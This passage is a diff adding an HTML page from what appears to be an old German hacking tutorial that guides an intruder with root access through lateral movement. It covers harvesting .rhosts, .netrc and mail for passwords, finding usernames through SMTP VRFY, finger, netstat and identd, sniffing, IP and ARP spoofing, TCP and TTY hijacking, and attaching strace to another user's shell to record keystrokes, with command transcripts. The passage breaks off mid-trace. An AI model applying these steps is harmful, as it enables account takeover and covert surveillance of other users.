+<tr>
+<td>&nbsp;<a href="mailto:best-of-security-request@suburbia.net">best-of-security-request@suburbia.net</a></td>
+
+<td></td>
+
+<td>subscribe best-of-security&nbsp;</td>
+</tr>
+
+<tr>
+<td>&nbsp;<a href="mailto:listserv@netspace.org">listserv@netspace.org</a></td>
+
+<td></td>
+
+<td>subscribe bugtraq&nbsp;</td>
+</tr>
+
+<tr>
+<td>&nbsp;<a href="mailto:majordomo@lists.gnac.net">majordomo@lists.gnac.net</a></td>
+
+<td></td>
+
+<td>subscribe firewalls&nbsp;</td>
+</tr>
+
+<tr>
+<td>&nbsp;<a href="mailto:fwall-users-request@tis.com">fwall-users-request@tis.com
+(???)</a></td>
+
+<td></td>
+
+<td>subscribe fwall-users&nbsp;</td>
+</tr>
+
+<tr>
+<td>&nbsp;<a href="mailto:majordomo@nsmx.rutgers.edu">majordomo@nsmx.rutgers.edu</a></td>
+
+<td></td>
+
+<td>subscribe www-security&nbsp;</td>
+</tr>
+</table></center>
+
+<p>Desweiteren kannst du einige Newsgroups mitlesen aber es ist viel Muell
+dabei und in den Hacker-Newsgroups ist schonmal garnichts zuholen.
+<p>Ok, gehen wir mal davon aus, dass du root Rechte hast. Eine Moeglichkeit
+um weitere Netze zu hacken besteht darin auf dem lokalen System nach Dateien
+wie <font color="#33FF33">.rhosts</font>, <font color="#33FF33">.netrc</font>
+und <font color="#33FF33">.forward</font> zu suchen; oder E-Mail nach Passworten
+(oder anderen interessanten Informationen) zu durchforsten. Um dir die
+Arbeit ueber 20.000 User zu checken (und beim Gebrauch von <i>NFS</i> noch
+zusaetzlich die UID zu wechseln) abzunehmen hab ich ein kleines Tool namens
+Searcher geschrieben.
+<br>Wenn du von einigen Usern das Passwort gecrackt hast, dann solltest
+du gucken von welchen Hosts sie sich einloggen, dazu kannst du <b>last</b>,
+<b>w</b>
+oder aehnliches benutzen, du koenntest auch die Hosts aufs Korn nehmen
+in die sie sich einloggen, herausfinfen kannst du das z.B. mit <b>ps
+</b>(mit
+w-Option), <b>netstat</b>, oder du verifizierst die Mail-Aliases (<font color="#33FF33">/etc/aliases</font>)
+bzw. <font color="#33FF33">.forward</font> um zu sehen wohin ein User seine
+E-Mail umleitet.
+<br>Jetzt solltest du noch herausfinden welchen Usernamen er auf dem entfernten
+Host benutzt (in <font color="#33FF33">.forward</font> und in <font color="#33FF33">/etc/aliases</font>
+muss es angegeben werden; z.B. "remote-user@other-site.com"), dazu kannst
+du S<i>MTP</i> verwenden... Bsp.: User "victim" auf dem lokalen System
+(Realnamen: Hackers Victim) hat sich mit <b>telnet</b> auf dem Rechner
+"host.account.edu" eingeloggt.
+<pre>> telnet host.account.edu 25
+&lt; Trying 123.10.0.1...
+&lt; Connected to host.account.edu.
+&lt; Escape character is '^]'.
+&lt; 220-host.account.edu Sendmail 8.6.9/8.6.9 ready at Mon, 21 Jul 1997
+&lt; 16:19:56 +0200
+&lt; 220 ESMTP spoken here
+> vrfy victim
+&lt; 550 victim... User unknown
+> vrfy hvictim
+&lt; 250 Hackers Victim &lt;hvictim@host.account.edu>
+> quit
+&lt; 221 host.account.edu closing connection
+&lt; Connection closed by foreign host.</pre>
+Der User verwendet also auf beiden Hosts nicht den selben Usernamen, da
+das Kommando "vrfy victim" von <i>Sendmail</i> (weitverbreitetes E-Mail-Verteilungs
+Programm, das an Port 25 haengt) mit "550 victim... User unknown" beantwortet
+wird.
+<br>Jetzt kannst du einige Kombinationen (z.B. aus den Initialen des Users)
+ausprobieren... BINGO!... "hvictim" ist der Username, den "victim" auf
+"host.account.edu" benutzt.
+<br>Bei vielen Mailservern wurde das <b>vrfy</b> Kommando aus Sicherheitsgruenden
+abgeschaltet. Jetzt koenntest du nur noch versuchen den Usernamen zu erraten,
+indem du E-Mails an den Server schickst und die Error-Messages des Servers
+ueberpruefst, die du fuer nicht vorhandene User zurueck bekommst - dieses
+Verfahren ist nicht gerade sehr unauffaellig, also auch nicht zu empfehlen.
+<p>Du kannst auch noch <b>finger</b> (wird aber aus Sicherheitsgruenden
+haeufig nicht angeboten) oder aber <b>rusers </b>benutzen um alle eingeloggten
+User auf "host.account.edu" zu erfragen. Mit <b>finger</b> kannst du auch
+Loginnamen erraten, dafuer schreibst du einfach ein Shell-Script, das aus
+einem Dictionary bis zu n Woerter einliehst und en bloc an <b>fingerd</b>
+schickt.
+<p>Falls du keinen Erfolg haben solltest oder diese Dienste nicht angeboten
+werden bist du immer noch nicht verloren. Wenn der User gerade eingeloggt
+ist, dann rufe das Programm <b>netstat</b> (dient unter anderem zum Debuggen
+von Netzwerkproblemen) auf.
+<pre>> netstat
+&lt; Active Internet connections
+&lt; Proto&nbsp;&nbsp;&nbsp; Recv-Q Send-Q Local Address&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Foreign Address&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (State)
+&lt; User
+&lt; victim
+&lt; tcp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; localhost:1032&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; host.account.edu:telnet&nbsp;&nbsp;&nbsp;&nbsp; ESTABLISHED
+&lt; root
+&lt; udp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; localhost:3043&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *:*
+&lt; Active UNIX domain sockets
+&lt; Proto RefCnt&nbsp; Flags&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Type&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; State&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Path
+&lt; unix&nbsp; 1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ ACC ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOCK_STREAM&nbsp;&nbsp;&nbsp;&nbsp; LISTENING&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /tmp/gpmctl
+&lt; unix&nbsp; 2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOCK_STREAM&nbsp;&nbsp;&nbsp;&nbsp; CONNECTED&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /dev/log
+&lt; unix&nbsp; 2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOCK_STREAM&nbsp;&nbsp;&nbsp;&nbsp; CONNECTED
+&lt; unix&nbsp; 2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ ACC ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOCK_STREAM&nbsp;&nbsp;&nbsp;&nbsp; LISTENING&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /dev/printer
+&lt; unix&nbsp; 2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOCK_STREAM&nbsp;&nbsp;&nbsp;&nbsp; CONNECTED&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /dev/log
+&lt; unix&nbsp; 2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOCK_STREAM&nbsp;&nbsp;&nbsp;&nbsp; CONNECTED
+&lt; unix&nbsp; 1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ ACC ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOCK_STREAM&nbsp;&nbsp;&nbsp;&nbsp; LISTENING&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /dev/log</pre>
+Die aktiven Unix Domain Sockets interessieren hier nicht; von Interesse
+ist nur...
+<pre>&lt; Active Internet connections
+&lt; Proto&nbsp;&nbsp;&nbsp; Recv-Q Send-Q&nbsp; Local Address&nbsp;&nbsp;&nbsp; Foreign Address&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (State)
+&lt; User
+&lt; victim
+&lt; tcp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; localhost:1032&nbsp;&nbsp; host.account.edu:telnet&nbsp;&nbsp;&nbsp; ESTABLISHED</pre>
+... hier kannst du sehen, dass der User "victim" eine Verbindung vom Port
+1032 des lokalen Hosts zum Telnet-Port (23, siehe File <font color="#33FF33">/etc/services</font>)
+von "host.account.edu" (der Hostname wird bei Ueberlaenge abgeschnitten;
+du kannst dir mit der Option "-n" auch die IP-Adresse anzeigen lassen)
+aufgebaut hat. Jetzt weist du genug um ein kleines "Authentifikationsprogram"
+(<b>identd</b>) fuer deine Zwecke zu misbrauchen. Kurz was zur eigentlichen
+Verwendung von
+<table>
+<tr>
+<td><b>identd</b>:&nbsp;</td>
+
+<td><b>identd</b> wird von <b>V8 Sendmail</b> dazu benutzt um gefaelschte
+E-Mails zu entschaerfen, indem <b>sendmail identd</b> befragt welcher User
+gerade eine Verbindung zu ihm aufgebaut hat. (Das Format fuer <b>identd</b>:
+Server/Remote-Port, Client/Local-Port)&nbsp;</td>
+</tr>
+</table>
+Los geht's! Bau eine TCP Verbindung zum Port 113 (hier lauscht <b>identd</b>)
+von "host.account.edu" auf.
+<pre>> telnet host.account.edu 113
+&lt; Trying 127.0.0.1...
+&lt; Connected to host.account.edu.
+&lt; Escape character is '^]'.
+> 23, 1032
+&lt; 23 , 1032 : USERID : UNIX : hvictim
+> Connection closed by foreign host.</pre>
+Jupp, da is' es "hvictim".
+<p>Falls der Typ <b>rlogin</b> oder <b>rsh</b> benutzt, dann sieh' dir
+mal die Prozess-Liste an, <b>ps auw | grep victim</b> fuer BSD Derivate
+und <b>ps -ef | grep victim</b> fuer SysV (AT&amp;T) Unix. Von Interesse
+fuer uns ist hier die '-l' Option der Befehle, damit gibt man den Usernamen
+auf dem Remote Host an (dasselbe gilt auch fuer <i>SecureShell</i> - <b>ssh</b>).
+Wenn du zwar die eben genannten Client-Programme in der Prozessliste siehst,
+aber die '-l' Option fehlt, dann sind die Usernamen auf beiden Rechnern
+gleich.
+<p>Desweiteren kannst du, wenn du den Source Code von <b>telnet</b> bzw.
+<b>telnetd</b>
+fuer das OS des lokalen Rechners hast, den Code so veraendern, dass die
+Account Informationen fuer ausgehende bzw. eingehende Verbindungen aufgezeichnet
+werden.
+<p>Die effektivste und auch einfachste Methode ist einen <i>Ethernet-Sniffer</i>
+zu installieren. Der Sniffer setzt die Netzkarte in den <i>Promiscuous
+Mode</i> und kann so alle Pakete, die sich in seiner Collision Domain befinden,
+aufzeichnen. Am Besten siehst du dir mal den Code und die Docu.s von 'nem
+Sniffer an und spielst etwas damit herum.
+<br>Das Sniffen funktioniert nicht bei <i>ATM</i>- und bei <i>10BaseT</i>/<i>100BaseT</i>-Netzen
+(mit intelligentem Switch - naja, aber auch hier gibt es Mittel und Wege
+*evilG*)... und bei <i>FDDI</i>- und <i>Tokenring</i>-Netzen geht's nur
+teilweise.
+<p>Die Methode mit dem Sniffer ist eine passive Attacke. Aktive Angriffe
+wie <i>(Blind-) IP Spoofing</i>, <i>TCP Hijacking</i>... sind etwas komplizierter
+und ich werde sie hier nur kurz erleutern.
+<br>&nbsp;
+<table BORDER >
+<tr>
+<th>Methode&nbsp;</th>
+
+<th>Beschreibung&nbsp;</th>
+</tr>
+
+<tr>
+<td>Blind IP-Spoofing&nbsp;</td>
+
+<td>Hierbei benutzt man eine falsche IP Source Adresse und versucht eine
+TCP Verbindung aufzubauen.&nbsp;
+<br>Es wird der 'Trusted Host' Mechanismus der BSD &acute;r&acute;-Dienste
+(meistens <b>rlogind</b>) ausgenutzt, dieser 'Sicherheits'-Mechanismus
+erlaubt Zugriff anhand der IP Source Adresse, es wird kein Passwort benoetigt
+(sollte das Sniffen von Passwoertern verhindern).&nbsp;
+<br>Die grosse Kunst bei dieser Form der Attacke besteht darin die TCP
+Sequencenummer (s. RFC 793) richtig zu raten (da man die IP Src. gefaelscht
+hat bekommt man die TCP Seq# des entfernten Hosts nicht zu Gesicht; es
+sei denn, man benutzt die IP Src. Adresse eines Hosts, der sich in der
+selben Collision Domain befindet).&nbsp;
+<br>Bei alten Systemen ist das "Raten" relativ einfach (64K Rule) aber
+bei neuen Systemen ist es nahezu unmoeglich, da sie ihre TCP Seq# random
+(naja, haeufig ist der Algorithmus selten wirklich random, fuehrt hier
+aber mal wieder zu weit) erstellen.&nbsp;</td>
+</tr>
+
+<tr>
+<td>Non-Blind IP-Spoofing&nbsp;</td>
+
+<td>Der Vorteil dieser Attacke ist, dass man im Gegensatz zur 'blinden'
+Version die TCP Seq# und die Daten sieht. Ein wieterer Vorteil ist, dass
+mehrere Moeglichkeiten existieren.&nbsp;
+<ol>
+<li>
+IP Source Routing + Alias Interface</li>
+
+<br>Diese Methode is sehr einfach zu realisieren, es werden einfach alle
+Router, die das Packet passieren soll im IP Header als zusaetzliche Option
+angegeben...&nbsp;
+<br>Tja, aber das Dumme ist, dass der <b>rlogind </b>ueberprueft ob zusaetzliche
+Optionen im IP Header gesetzt sind, und wenn dem so ist, dann wird das
+Packet irgnoriert und eine Logmessage an <b>syslogd </b>uebergeben (jedenfalls
+wird es in der BSD Version gemacht und ich denke SysV macht es auch).&nbsp;
+<br>Zu allem Ueberfluss droppen mittlerweile die meisten Router IP Packets
+mit der Source-Routing Option.
+<li>
+Der gespoofte/zu attackierte Host befindet sich in der selben Collision
+Domain wie dein Host. Somit kannst du alle Packete sehen indem du deine
+Ethernetkarte in den Promisc. Mode schaltest (s. Sniffer).</li>
+
+<li>
+Du hast den ISP des Netzes gehackt, an dem der gespoofte/attackierte Host
+haengt. Es kann (generell) wie zuvor verfahren werden.&nbsp;</li>
+
+<li>
+Oder ARP Reply Spoofing ist sehr einfach und kompfortabel...&nbsp;</li>
+
+<br>Du erzaehltst dem zu hackenden Rechner einfach, dass die gespoofte
+IP zu deiner Hardware/Ethernet-Adresse gehoert, indem du das IP/HW-Paar
+mit Hilfe einer ARP Message in seinem ARP Cache eintragen laesst.&nbsp;
+<br>Ist leider mal wieder nur auf Collision Domains beschraenkt.&nbsp;
+<li>
+Die Route zwischen gepsooftem Host und attackiertem Host geht ueber 'deinen'
+Router.</li>
+
+<br>Das Schoenste ist natuerlich, wenn der Router eine Unix-Maschine ist
+auf der du root-Rechte besitzt und die Route per default ueber deinen Router
+laeuft. Naja, meistens ist es keine Unix-Maschine sondern ein Cisco, 3Com,
+Ascend, Livingston PM oder sonstwas und du must die Route erst ueber &acute;deinen&acute;
+Router redirecten (spoofe EGP/RIP Messages, oder vielleicht (wenn 'dein'
+Netz und das zuattakierende Netz direkt am selben Backbone haengen) ICMP
+Redirect Messages)&nbsp;</ol>
+</td>
+</tr>
+
+<tr>
+<td>TCP Hijacking&nbsp;</td>
+
+<td>Hierbei geht es darum eine bestehende TCP-Verbindung zu uebernehmen
+.&nbsp;
+<br>Dabei ergibt sich das gleiche Problem wie beim Non-Blind IP-Spoofing:
+man muss irgendwie in die Route der beiden Rechner kommen um die TCP Seq#
+mitzulesen.&nbsp;
+<br>Wenn man die Verbindung uebernommen hat kann man z.B. Shell-Commands
+in den Datenstrom einfuehgen, die dann auf dem entfernten Host ausgefuehrt
+werden.&nbsp;</td>
+</tr>
+</table>
+
+<p>Bei den IP-Spoof Attacken, muss darauf geachtet werden, dass der Host,
+dessen IP Adresse man spooft, nicht auf die Pakete des gefoolten Hosts
+antworten kann (hierzu benutzt man eine <i>DoS (Denial-of-Service) Attacke</i>),
+denn die Antwort (der TCP Stack generiert ein TCP RST Packet, da er nichts
+mit den empfangenden Paketen anfangen kann) wuerde den TCP Stack des attackierten
+Rechners dazu bringen die TCP Connection sofort zu beenden... und wer will
+das schon?
+<p>Drei "Sniffer"-Techniken erlauben es sogar verschluesselte Verbindungen
+(z.B. mit <i>SSH</i>) im Klartext aufzuzeichnen (bzw. Daten einzugeben).
+Dabei handelt es sich um <i>TTY-Hijacking,</i> <i>Process
+</i>(bzw.
+<i>Systemcall</i>)
+<i>Tracing
+</i>und
+die <i>Man-in-the-Middle (MIM) Attack</i>. Die ersten beiden Verfahren
+setzen den root Zugriff auf einem der Endsysteme voraus.
+<p>Beim <i>TTY-Hijacking </i>gibt es die verschiedensten Arten.
+<ul>
+<li>
+Ein einfacher 'ioctl()'-Aufruf (siehe dazu den Source Code von<b> </b><a href="http://www.thc.org">Smeagol
+(s. thc-uht1.tgz)</a> ) erlaubt es zeichenweise Daten in den TTY-Stream
+einzugeben (aber nicht auszulesen).</li>
+
+<br>Das Schoene an dieser Methode ist, dass man nicht unbedingt root-Rechte
+benoetigt. SEHR alte Systeme checken die Zugriffserlaubnis fuer Specialfiles
+anhand der r/w/x-Perms des Filesystems und nicht mit Hilfe des Kernels.
+SunOS hat einen Bug, der es erlaubt selbst non-root Usern einen Filedescriptor
+fuer Specialfiles zu erhalten.
+<li>
+Man kann die Shell eines Users durch einen <i>PTY</i>-Wrapper ersetzen
+(<i>PTY</i> = Pseudo-Terminal-Type), dadurch kann man alle Ein- und Ausgaben
+mitlesen.</li>
+
+<li>
+Einfuehgen von <i>LKM</i>s (Loadable Kernelmodules) erlaubt das Mitschneiden
+von Ein-/Ausgaben und die Eingabe von eigenen Daten durch veraendern von
+STREAMS</li>
+
+<li>
+Durch das Verbiegen von Systemcalls (aehnlich dem Verbiegen von DOS Interrupts
+in der Intr-Vektortabelle, aber wesentlich einfacher) koennen Eingaben
+aufgezeichnet werden.</li>
+</ul>
+Ok, kommen wir zum Tracen von Systemcalls.
+<br>Es wird eigentlich benutzt um Programme zu debuggen. Man kann den Aufruf
+von Systemcalls (und Signals) incl. Parametern verfolgen. Das coole ist,
+dass viele Unix-Derivate ueber dieses Feature und den entsprechenden Tools
+verfuehgen.
+<br>Unter Linux heisst dieses Programm <b>strace</b> (SunOS: <b>trace</b>,
+Solaris: <b>truss</b>, IRIX: <b>par</b>).
+<p>Ok, als erstes muessen wir uns ein Opfer aussuchen, d.h. die Shell eines
+Users (oder natuerlich auch eine bereits bestehende Verbindung mit <b>telnet</b>,
+<b>rlogin,
+ssh</b>...). Dazu benutzen wir <b>ps</b>.
+<pre>> ps
+&lt;&nbsp;&nbsp;&nbsp;&nbsp; PID&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; TTY&nbsp;&nbsp;&nbsp;&nbsp; STAT&nbsp;&nbsp;&nbsp; TIME&nbsp;&nbsp;&nbsp; COMMAND
+&lt;&nbsp;&nbsp;&nbsp;&nbsp; 69&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; v04&nbsp;&nbsp;&nbsp;&nbsp; SW&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0:00&nbsp;&nbsp;&nbsp; (agetty)
+&lt;&nbsp;&nbsp;&nbsp;&nbsp; 70&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; v05&nbsp;&nbsp;&nbsp;&nbsp; SW&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0:00&nbsp;&nbsp;&nbsp; (agetty)
+&lt;&nbsp;&nbsp;&nbsp;&nbsp; 257&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; v06&nbsp;&nbsp;&nbsp;&nbsp; SW&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0:00&nbsp;&nbsp;&nbsp; (agetty)
+&lt;&nbsp;&nbsp;&nbsp;&nbsp; 599&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; v02&nbsp;&nbsp;&nbsp;&nbsp; S&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0:00&nbsp;&nbsp;&nbsp; -bash
+&lt;&nbsp;&nbsp;&nbsp;&nbsp; 707&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; v03&nbsp;&nbsp;&nbsp;&nbsp; S&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0:00&nbsp;&nbsp;&nbsp; -bash
+&lt;&nbsp;&nbsp;&nbsp;&nbsp; 744&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; v02&nbsp;&nbsp;&nbsp;&nbsp; R&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0:00&nbsp;&nbsp;&nbsp; ps</pre>
+So, wir nehmen uns mal die <b>bash</b> mit der PID 707 vor. Wir rufen <b>strace</b>
+mit der Option '-f' auf um auch die Child-Prozesse der <b>bash</b>, wie
+z.B. <b>telnet</b>, zutracen. Eine grosse Menge der Ausgaben von <b>strace</b>
+habe ich herausgeschnitten um die Lesbarkeit zu verbessern.
+<pre>> strace -f -p 707 2>&amp;1 | egrep "read|recv|write|send|exec|socket|connect"
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Process 707 attached - interrupt to quit
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; read(0, "t", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; write(2, "t", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; read(0, "e", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; write(2, "e", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; read(0, "l", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; write(2, "l", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; read(0, "n", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; write(2, "n", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; read(0, "e", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; write(2, "e", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; read(0, "t", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; write(2, "t", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; read(0, " ", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; write(2, " ", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; read(0, "d", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; write(2, "d", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; read(0, "o", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; write(2, "o", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; read(0, "o", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; write(2, "o", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; read(0, "\r", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; write(2, "\n", 1) = 1</pre>
+Hier koennen wir sehen wie der User <b>telnet doo</b> aufruft. Mit &acute;read(..)&acute;
+werden die Usereingaben gelesen und mit &acute;write(..)&acute; zum Terminal
+des Users geschrieben.
+<pre>&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: execve("/bin/telnet", "telnet", "doo", env:["ignoreeof=10",&nbsp; [pid 772]:</pre>
+Hier sehen wir nochmal genauer welcher Child-Prozess aufgerufen wurde.
+<pre>&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; socket(PF_INET, STREAM, IPPROTO_IP) = 3
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: connect(3, AF_INET(23, 10.0.0.1), 16) = 0</pre>
+Der Socket wird erzeugt und die Verbindung (IP Adresse und Port sind gut
+sichtbar) wird aufgebaut.
+<pre>&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: write(1, "Connected to doo.the-haze.org.\n", 32) = 32
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: write(1, "Escape character is '^]'.\n", 26) = 26</pre>
+Der uebliche telnet-Kram wird dem User angezeigt.
+<pre>&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: recv(3, "\ff\fb\1\r\nLinux 1.1.59 (doo.the-haze".., 1024, 0) = 49
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: write(1, "\r\nLinux 1.1.59 (doo.the-haze.or".., 46) = 46</pre>
+Das Welcome-Banner des Remote Hosts wird empfangen und an den User weitergegeben.
+<pre>&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: recv(3, "\ff\f2\r\ndoo login: ", 1024, 0) = 15
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: write(1, "\r\ndoo login: ", 13) = 13</pre>
+Die Login-Aufforderung.
+<pre>&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "t", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "t", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: recv(3, "t", 1024, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: write(1, "t", 1) = 1</pre>
+Der ertse Buchstabe des Loginnamens wird eingelesen (&acute;read(..)&acute;),
+and den fernen Rechner gesendet (&acute;send(..)&acute;), das Echo empfangen
+(&acute;recv(..)&acute;) und zu dem User gegeben (&acute;write(..)&acute;).
+<pre>&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "i", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "i", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: recv(3, "i", 1024, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: write(1, "i", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "c", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "c", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: recv(3, "c", 1024, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: write(1, "c", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "k", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "k", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: recv(3, "k", 1024, 0) = 1
